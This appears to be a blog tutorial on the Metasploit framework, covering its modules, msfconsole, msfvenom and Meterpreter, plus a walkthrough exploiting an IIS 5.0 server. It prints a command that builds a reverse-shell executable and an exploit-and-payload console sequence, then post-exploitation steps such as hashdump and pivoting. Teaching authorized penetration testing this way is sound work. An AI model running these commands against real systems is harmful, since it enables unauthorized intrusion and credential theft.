Metasploit: A Powerful Exploitation Framework for Pen Testers

If you're an aspiring penetration tester or ethical hacker, one of the most important tools you need to master is Metasploit. It's an extremely powerful and flexible framework that lets you streamline vulnerability scanning and exploitation while auditing networks and systems.

In this in-depth guide, I'll walk you through everything you need to know to start using Metasploit effectively in your pen testing workflows. We'll cover the core components of the framework, how to use important tools like the Metasploit console and Meterpreter, and step through a worked example of discovering and exploiting a vulnerability.

By the end of the post, you'll have a solid foundation to start practicing with Metasploit safely to hone your skills. Let's dive in!

What is Metasploit?

At its core, Metasploit is a penetration testing framework written in Ruby that provides all the tools you need to find and exploit security holes throughout the entire lifecycle of a penetration test.

The beauty of Metasploit is that it's an open-source, extensible framework. This means that in addition to a huge library of built-in exploits and payloads, you can write your own modules in Ruby to extend its functionality exactly how you need.

Metasploit was acquired by cybersecurity firm Rapid7 in 2009, which still maintains the open core framework while also providing commercial solutions like Metasploit Pro with more advanced features for enterprise security teams.

One of the major advantages of Metasploit is that it aggregates exploits and payloads for a huge number of known vulnerabilities in one place. The framework is constantly updated as new vulnerabilities are discovered and published in databases like the Common Vulnerabilities and Exposures (CVE) list.

So when a vulnerability in a popular piece of software or operating system is publicly disclosed, a working exploit module for it often lands in Metasploit within days or weeks, which lets you check whether your organization is affected. Note the word "disclosed": Metasploit tracks public vulnerabilities, so a true zero-day (one with no public details or fix) will rarely have a module until it becomes public.

Metasploit is also preinstalled in popular penetration testing Linux distributions like Kali Linux and Parrot OS, so it's always at your fingertips.

Key Components of Metasploit

To use Metasploit effectively, it's important to understand its key components and how they work together to find and exploit vulnerabilities. Let's break down the most important pieces.

Exploits

An exploit in Metasploit is a piece of code that takes advantage of a security flaw or vulnerability to gain access to a target system or network without authorization.

Exploits can target all types of vulnerabilities, including ones found in network services, web applications, operating systems, browsers, and even IoT devices. Common techniques include memory corruption such as buffer overflows and injection flaws such as SQL injection, with the usual goal being remote code execution on the target.

Metasploit has a huge library of different exploits that is constantly updated, so you can quickly find ones relevant to the systems you're testing.

There are two main types of exploits:

  1. Active exploits – These connect to the target, exploit the vulnerability, and exit (or hand you a session). Most exploits against network services work this way.

  2. Passive exploits – These start a listener (typically a malicious web server or file share) and exploit clients as they connect. Browser and other client-side exploits fall into this category: the module waits for a victim to open the link, much as an attacker distributing a Trojan horse waits for a user to run it.

Payloads

While an exploit takes advantage of a vulnerability, a payload is the actual code that will run on the target system. Exploits and payloads go hand-in-hand – the exploit gets the payload into the vulnerable system.

Metasploit has a wide variety of payloads for different goals and situations, including:

  • Command shells to remotely control the target system
  • Meterpreter agents for advanced post-exploitation
  • Small single-purpose payloads, such as running a single command or adding a local user

Activities often lumped in with "payloads" elsewhere, like keylogging, privilege escalation, and pivoting traffic through the compromised machine, are actually carried out from a Meterpreter session or with Metasploit's post modules once the payload has given you a foothold.

There are three main categories of payloads in the framework:

  1. Singles – Self-contained payloads like windows/shell_reverse_tcp that do everything in one piece: connect back and provide the shell.

  2. Stagers – Small payloads whose only job is to set up a connection channel (connect back to the attacker, or listen on a port) and pull down the second part. Stagers are tiny so they fit in the limited space an exploit often leaves for the payload.

  3. Stages – The second part of a staged payload, downloaded and executed by the stager, such as the Meterpreter DLL or a full shell.

You can tell the two forms apart by name: a slash between stage and transport, as in windows/meterpreter/reverse_tcp, means staged, while an underscore, as in windows/meterpreter_reverse_tcp or windows/shell_reverse_tcp, means a single (stageless) payload. Singles are larger but there is no second download to fail, which matters on flaky networks.

While not every payload will work with every exploit, you can use the show payloads command after selecting an exploit in the Metasploit console to see compatible payloads.
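To make the stager/stage split concrete, here is a small Ruby model of what happens on the wire when a staged reverse_tcp payload connects back. It is an added example, not code from the original post or from the Metasploit project: the "handler" stands in for exploit/multi/handler, the "stager" for the first-stage shellcode, and the stage is a constructed byte string that is returned instead of executed. The 4-byte little-endian length prefix matches what Metasploit's Windows reverse_tcp stager reads before pulling down its stage; everything else (function names, the loopback port) is an assumption for the demo.

```ruby
require 'socket'

# Constructed stand-in for a stage. In Metasploit this would be, e.g., the
# Meterpreter DLL that windows/meterpreter/reverse_tcp downloads; here it is
# just bytes we can compare against. .b forces a binary (ASCII-8BIT) string.
FAKE_STAGE = ("MZ" + "\x90" * 60 + "FAKE-STAGE-END").b

# Handler side: the role of exploit/multi/handler for a staged reverse_tcp
# payload. Waits for the stager to connect, then sends the stage, prefixed
# with its length as a 32-bit little-endian integer ('V' in pack terms).
# Returns the number of stage bytes sent.
def serve_stage(server, stage)
  client = server.accept
  client.write([stage.bytesize].pack('V'))
  client.write(stage)
  client.close
  stage.bytesize
end

# Stager side: the whole job of the tiny first-stage shellcode. Connect back
# to LHOST:LPORT, read the 4-byte length, then read that many bytes. A real
# stager would now jump into the buffer; this model returns it instead.
def run_stager(lhost, lport)
  sock = TCPSocket.new(lhost, lport)
  len = sock.read(4).unpack1('V')
  stage = sock.read(len)
  sock.close
  stage
end

# Runs both halves on the loopback interface and returns the stage the stager
# received, so the round trip can be checked end to end.
def simulate_staged_delivery(stage = FAKE_STAGE, lhost = '127.0.0.1')
  server = TCPServer.new(lhost, 0)   # port 0: let the OS pick a free LPORT
  lport = server.addr[1]
  handler = Thread.new { serve_stage(server, stage) }
  received = run_stager(lhost, lport)
  handler.join
  server.close
  received
end

if __FILE__ == $PROGRAM_NAME
  got = simulate_staged_delivery
  puts "stager received #{got.bytesize} bytes, intact: #{got == FAKE_STAGE}"
end
```

The point to take away is how little the stager has to do, which is why it fits where a full Meterpreter would not, and why the listener must already be running (the handler here is started before the stager connects) or the connection back is simply lost.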

Auxiliaries

Auxiliary modules are an important piece of the framework that let you run other useful tasks besides just finding and exploiting vulnerabilities.

For example, scanning for open ports, fingerprinting systems, brute-forcing passwords, performing man-in-the-middle attacks, or fuzzing applications with unexpected input to see how they respond.

The beauty of auxiliaries is that you can write your own custom modules in Ruby tailored to your needs. For example, you could write a scanner that checks a network for unpatched systems vulnerable to a specific CVE on a schedule.

This allows you to extend Metasploit however you need, and is a great option if you don't want to use a separate tool for a certain task like network scanning.

Important Metasploit Tools

Now that you understand the key pieces of the Metasploit framework conceptually, let's highlight some of the most important tools you need to know to actually use it.

msfconsole

The msfconsole is the main command-line interface you'll use to interact with the framework. While it has a learning curve, once you master it you'll be able to quickly find exploits, configure payloads, run scans, and exploit targets.

Some of the most useful msfconsole commands include:

  • search – Find modules that match a keyword (narrow with filters such as type:, platform:, cve:, and port:)
  • use – Load a specific Metasploit module
  • info – Show the loaded module's description, targets, references, and options
  • show options – See the variables you need to configure for the selected module
  • set – Define the value for a specific variable
  • check – Where the module supports it, test whether the target is vulnerable without exploiting it
  • exploit (or run) – Run the module with all variables defined
  • sessions – List and interact with the shells you have obtained

msfconsole also supports tab completion, which is a big time-saver when entering commands. Once you're comfortable with the console, you can automate repetitive sequences with resource scripts (plain text files of console commands, run with msfconsole -r file.rc or the resource command), and you can drop into the framework's Ruby interpreter with the irb command for ad hoc scripting.

msfvenom

msfvenom is a separate command-line tool for generating payloads on the fly in whatever form you need. It was created by merging the older msfpayload and msfencode tools.

Why would you need a stand-alone payload? The exploit-plus-payload flow in msfconsole only covers cases where Metasploit delivers the code itself. Often you need the payload as a file or a blob instead: an executable to run during post-exploitation, raw shellcode to embed in an exploit you are writing, or a web shell in the format the target server executes (aspx, php, jsp, war). msfvenom supports a wide variety of output formats (C, Python, Ruby, exe, dll, aspx, and much more; msfvenom -l formats lists them) and can run the payload through one or more encoders.

A caveat on encoders, because this is the most common misconception about msfvenom: encoders exist to strip bad characters (null bytes, newlines, and so on) out of shellcode so it survives the vulnerable input path. They were never a reliable way to evade antivirus, and today the default payloads and common encoders such as x86/shikata_ga_nai are thoroughly signatured, so expect modern antivirus and EDR to flag the output no matter how many iterations you apply.

To generate a payload with msfvenom, you supply:

  • The payload you want to generate (-p)
  • Any payload options, given as KEY=VALUE pairs (LHOST, LPORT, and so on)
  • The output format (-f)
  • Optionally, an encoder (-e) and how many times to apply it (-i)
  • The output file name (-o); without it the result goes to stdout

For example, here's an msfvenom command that generates an encoded Windows reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse.exe

This produces an executable that opens a reverse shell to 10.1.1.1:4444, with the shellcode run through x86/shikata_ga_nai nine times. Use the encoder's full name as it appears in msfvenom -l encoders, architecture prefix included. To catch the connection, start a listener in msfconsole with use exploit/multi/handler and the same payload, LHOST, and LPORT before running the executable.

Meterpreter

Meterpreter is Metasploit's most powerful payload. It's an advanced, dynamically extensible payload that lets you gather detailed information and execute commands on the target machine, all over a single connection.

Some of the key features of Meterpreter include:

  • Implementations for Windows, Linux, macOS, and Android, plus runtime-hosted versions (Java, PHP, Python)
  • Runs in memory: on Windows it is injected as a reflectively loaded DLL and never has to be written to disk
  • Encrypted communications, for example TLS on the reverse_https transport
  • Modular design: extensions such as stdapi, priv, incognito, kiwi, and python are loaded on demand with the load command
  • Detailed, built-in commands for post-exploitation
  • Driven from the attacker side by Ruby, which is how Metasploit's post modules script a session

With a Meterpreter session on the target system, you can dump password hashes (hashdump), browse the file system, record keystrokes, take webcam snapshots, pivot to other machines, and much more. Be realistic about stealth, though: "in memory" does not mean invisible, and an unmodified Meterpreter is one of the most signatured things you can run, so current antivirus and EDR products will usually flag it.

Putting It All Together: Hacking with Metasploit

Now that you understand the key pieces of Metasploit, let's walk through a basic penetration test so you can see how it all fits together.

Imagine you're a new pentester at Acme Inc and you've been tasked with auditing the company's network for security holes. You fire up Kali Linux and decide to use Metasploit to streamline your workflow.

Scanning

The first step is to perform reconnaissance to map out the network and find potential targets. You can run Nmap directly from msfconsole with the db_nmap command, which takes the same arguments as nmap. Make sure the database is connected first: db_status will tell you, and msfdb init from your shell sets it up if it isn't.

For example, db_nmap -sV 192.168.1.0/24 would scan all 256 addresses in the 192.168.1.0/24 range and fingerprint any machines it finds. The -sV option probes the open ports to try to detect service/version info.

The db_ prefix ensures the results are saved to Metasploit's database, so you can refer back to them with the hosts and services commands.

Another option for the scanning step is to use a vulnerability scanner like Nessus (or plain nmap with -oX output) and import the results from within msfconsole:

msf6 > db_import /path/to/scan.nessus
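Whether you use db_nmap or db_import, what ends up in the database is a table of hosts and the services on them. The following Ruby script, added here as an example (it is not code from the original post or from Metasploit), parses Nmap's XML output into that same host/port/service view and then applies the selection you would otherwise do by eye in msfconsole: hosts with a given port open whose service banner matches a pattern. The XML is a constructed sample, and the addresses and banners in it are made up.

```ruby
require 'rexml/document'

# Constructed sample of nmap -sV -oX output for two hosts (made-up addresses).
SAMPLE_NMAP_XML = <<~XML
  <nmaprun scanner="nmap" args="nmap -sV -oX - 192.168.1.0/24">
    <host>
      <status state="up"/>
      <address addr="192.168.1.105" addrtype="ipv4"/>
      <ports>
        <port protocol="tcp" portid="80">
          <state state="open"/>
          <service name="http" product="Microsoft IIS httpd" version="5.0" ostype="Windows"/>
        </port>
        <port protocol="tcp" portid="139">
          <state state="open"/>
          <service name="netbios-ssn"/>
        </port>
      </ports>
    </host>
    <host>
      <status state="up"/>
      <address addr="192.168.1.110" addrtype="ipv4"/>
      <ports>
        <port protocol="tcp" portid="22">
          <state state="open"/>
          <service name="ssh" product="OpenSSH" version="8.9p1"/>
        </port>
        <port protocol="tcp" portid="80">
          <state state="filtered"/>
          <service name="http"/>
        </port>
      </ports>
    </host>
  </nmaprun>
XML

# One row per (host, port), the same shape as msfconsole's `services` table.
Service = Struct.new(:host, :port, :proto, :state, :name, :product, :version)

# Parse nmap XML into a flat list of Service rows. Hosts without an IPv4
# address element are skipped; ports without a <service> keep nil fields.
def parse_nmap_xml(xml)
  doc = REXML::Document.new(xml)
  rows = []
  doc.elements.each('nmaprun/host') do |host|
    addr_el = host.elements["address[@addrtype='ipv4']"]
    next unless addr_el
    addr = addr_el.attributes['addr']
    host.elements.each('ports/port') do |port|
      svc = port.elements['service']
      rows << Service.new(
        addr,
        port.attributes['portid'].to_i,
        port.attributes['protocol'],
        port.elements['state'].attributes['state'],
        svc && svc.attributes['name'],
        svc && svc.attributes['product'],
        svc && svc.attributes['version']
      )
    end
  end
  rows
end

# Hosts with `port` open whose "product version" banner matches `banner`.
# Closed and filtered ports are ignored: a filtered 80 is not a web target.
def candidate_hosts(rows, port:, banner:)
  rows.select { |r| r.port == port && r.state == 'open' && "#{r.product} #{r.version}".match?(banner) }
      .map(&:host)
      .uniq
end

if __FILE__ == $PROGRAM_NAME
  rows = parse_nmap_xml(SAMPLE_NMAP_XML)
  rows.each { |r| puts format('%-15s %5d/%s %-9s %s %s', r.host, r.port, r.proto, r.state, r.product, r.version) }
  puts "IIS 5.0 on port 80: #{candidate_hosts(rows, port: 80, banner: /IIS httpd 5\.0/).join(', ')}"
end
```

Feeding the result into the next step is then mechanical: each candidate host becomes an RHOSTS value, and the banner regex is the thing you would otherwise type as a search filter.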

Finding Exploits

After you have a list of target machines and services fingerprinted, it‘s time to find relevant exploits.

Let's say your scan turned up a Windows 2000 machine running a web server on port 80. To find exploits that may work on this server, in the msfconsole you could search:

msf6 > search type:exploit platform:windows target:2000 port:80

This would give you a list of Windows exploits for port 80 whose target list includes Windows 2000. If the list is long, narrow it further with cve: or a product name such as iis.

If you spot an enticing exploit, say the MS03-007 WebDAV ntdll.dll buffer overflow in IIS 5.0, you could select it with use:

msf6 > use exploit/windows/iis/ms03_007_ntdll_webdav

Configuring Options

Before you can run the exploit, you need to configure it with the appropriate options.

Running show options will give you a list of all the variables you need to set. Exploits have required variables like RHOSTS (the target host, a range, or a file of hosts) and RPORT (target port), and sometimes optional ones like SSL or a URI path.

Set the variables to your intended target, for example:

msf6 > set RHOSTS 192.168.1.105
msf6 > set RPORT 80

Selecting a Payload

Next you need to decide what payload you want to pair with your exploit. Run show payloads to see a list of compatible payloads for that specific exploit; many modules also pick a sensible default for you.

Let's say you spot windows/meterpreter/reverse_tcp in the list and decide to use that to try to gain a Meterpreter session:

msf6 > set payload windows/meterpreter/reverse_tcp

Running show options again will reveal payload-specific options you need to set, like LHOST (the IP the target connects back to, which must be reachable from the target, so on a multi-homed box pick the right interface) and LPORT (the port to connect back on). For example, substituting your own machine's address:

msf6 > set LHOST 192.168.1.50
msf6 > set LPORT 4444

Exploiting

Once you've configured everything, type exploit (or run) to run the module. If the module implements check, run that first to confirm the target looks vulnerable before you throw a memory-corruption exploit at a box that may crash.

If the exploit is successful and Metasploit receives a TCP connection back from the payload on the target machine, you'll see a meterpreter > prompt that lets you interact with the target.

Meterpreter has a variety of commands such as sysinfo, getuid, ls, download, and hashdump for interacting with the target machine. You can see all of the options available by running the help command; background returns you to msfconsole, and sessions -i <id> takes you back into the session.

From there, you could continue with privilege escalation (getsystem, or the post/multi/recon/local_exploit_suggester module for candidates) and pivoting deeper into the network until you've achieved your objectives (e.g. capturing a domain admin account).

Armitage – a Graphical Interface

While msfconsole is extremely powerful, the command line isn't for everyone. If you prefer a graphical user interface for Metasploit, you can use the Armitage tool.

Armitage provides a graphical frontend to Metasploit that visualizes targets and recommends exploits. It integrates with Metasploit and the database backend.

With Armitage, you can launch scans, share sessions with teammates through its team server, and run exploits from an intuitive interface. However, you'll still need to use msfconsole for the full features and flexibility of the framework. Be aware that Armitage has not been actively maintained for years, so expect compatibility problems with current Metasploit releases; for day-to-day work, learning the console is the better investment.

Staying Within the Law

While hacking systems without permission may sound thrilling, as an ethical hacker or penetration tester, it's critical that you ensure you stay within legal bounds at all times. A few tips:

  • Always get explicit, written permission from the owner of any system before attempting to scan or exploit it
  • Make sure you understand your client's expectations and rules of engagement before beginning a pentest
  • Never test production systems unless you have explicit approval
  • Carefully document the scope of your penetration testing activities in case any issues arise
  • Keep detailed notes of your findings to provide in a pentesting report to your client

Metasploit is an extremely powerful piece of software, but like any tool, it can be abused. Make sure to only use it for good!

Go Forth and Pwn

In this guide, we've covered the key concepts and tools you need to know to start using Metasploit effectively in your own penetration tests and security research. While it may seem overwhelming at first, with practice you'll master this essential tool.

If you want to learn more and really dive deep into Metasploit, Rapid7's documentation at https://metasploit.help.rapid7.com/ is a good place to start.

As you're learning, be sure to practice only on systems you have permission to test (deliberately vulnerable VMs such as Metasploitable exist for exactly this), and don't be afraid to experiment with writing your own exploits and modules. Before long, you'll be finding vulnerabilities like a pro with this Swiss army knife of hacking.

The power of Metasploit is now in your hands. Go forth and pwn!
